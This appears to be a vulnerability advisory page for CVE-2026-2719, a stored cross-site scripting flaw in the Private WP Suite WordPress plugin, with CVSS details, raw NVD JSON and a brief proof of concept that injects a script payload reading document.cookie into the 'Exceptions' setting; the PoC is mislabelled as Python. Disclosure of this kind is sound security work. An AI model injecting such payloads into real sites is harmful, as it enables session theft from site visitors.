Security Vulnerability Report
中文
CVE-2026-2719 CVSS 4.4 MEDIUM

CVE-2026-2719

Published: 2026-04-22 09:16:21
Last Modified: 2026-04-22 20:22:51

Description

The Private WP suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Exceptions' setting in all versions up to, and including, 0.4.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Private WP Suite <= 0.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-2719: Stored XSS in Private WP Suite Plugin // Preconditions: Administrator access, WordPress Multisite or unfiltered_html disabled. // Step 1: Navigate to the plugin settings page // URL: /wp-admin/options-general.php?page=private-wp // Step 2: Locate the 'Exceptions' input field // Step 3: Inject the payload into the field let payload = '"><script>alert(document.cookie);</script>'; // Step 4: Save the settings // The payload is now stored in the database via the 'Exceptions' option. // Step 5: Trigger the vulnerability // Visit any frontend or backend page that echoes the 'Exceptions' value. // The alert box will execute, demonstrating the XSS.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2719", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:21.130", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Private WP suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Exceptions' setting in all versions up to, and including, 0.4.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/private-wp-suite/tags/0.4.1/private-wp-suite.php#L153", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/private-wp-suite/trunk/private-wp-suite.php#L153", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/af88a631-c4ec-47ec-ad9b-1ef38ea1be09?source=cve", "source": "[email protected]"}]}}